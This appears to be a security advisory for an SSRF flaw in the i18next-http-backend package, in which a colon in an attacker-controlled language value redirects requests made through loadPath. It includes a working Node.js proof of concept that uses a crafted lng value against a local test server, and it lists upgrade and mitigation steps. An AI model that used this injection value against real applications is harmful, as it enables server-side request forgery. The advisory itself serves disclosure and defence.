Vulnerability in i18next-http-backend (CVE-2026-105800)
Summary
Vulnerability in i18next-http-backend (CVE-2026-105800). Risk of unauthorized operations or information disclosure. Exploitable via loadPath. Mitigation: upgrade to 4.0.2 or later.
Original description
The description as published by the source.
There is an SSRF vulnerability when using i18next-http-backend. A colon in an attacker-controlled language value can make a custom path template request an unintended origin.
This is reachable under the following conditions: Attacker controls i18next language or namespace input that is interpolated into loadPath.
Proof of Concept
// SSRF through a colon-only URL scheme in i18next-http-backend interpolation.
const http = require("node:http");
const Backend = require("i18next-http-backend");
function read(backend, lng, ns) {
return new Promise((resolve) => {
backend.read(lng, ns, (err) => resolve(err));
});
}
async function main() {
let gotRequest = false;
const server = http.createServer((req, res) => {
gotRequest = req.url === "/common.json";
res.writeHead(200, { "content-type": "application/json" });
res.end("{}");
});
await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
const backend = new Backend(null, { loadPath: "{{lng}}/{{ns}}.json" });
const lng = `http:127.0.0.1:${server.address().port}`;
const err = await read(backend, lng, "common");
server.close();
const vulnerable = gotRequest && !err;
console.log(vulnerable ? "VULNERABLE" : "SAFE");
if (!vulnerable) process.exitCode = 1;
}
main();
Run:
npm install --ignore-scripts
node poc.js
The expected result is:
VULNERABLE

CVE-2026-105800 (i18next-http-backend) — CWE-74 / CVSS v3 3.7
Attack vector: remote (network-reachable) / unauthenticated / no user interaction
Attack surface: loadPath / addPath / lng
Patched: 4.0.2 — apply immediately
Plan: 1) Audit SBOM/dependencies, 2) Stage→prod upgrade, 3) Add WAF/proxy monitoring on affected endpoints, 4) Hunt IOCs in logs.
Refs: see the GHSA / vendor advisory / patched release linked on this page.
A vulnerability (CWE-74) exists in i18next-http-backend. Attackers reach the vulnerable code path via loadPath without authentication.
Check the vendor advisory for the affected versions of i18next-http-backend. Attack surface: loadPath / addPath / lng.
Severity: Low (CVSS 3.7/10). Risk of unauthorized operations or information disclosure.
Update to 4.0.2.
Until the patch is applied: disable the affected feature, apply WAF rules, or restrict access via network ACLs.
Search webserver/proxy logs for unusual request patterns matching this CVE's known IOCs. Run grep -r 'i18next-http-backend' . against your dependency files (package-lock.json, requirements.txt, go.sum) to find affected services.
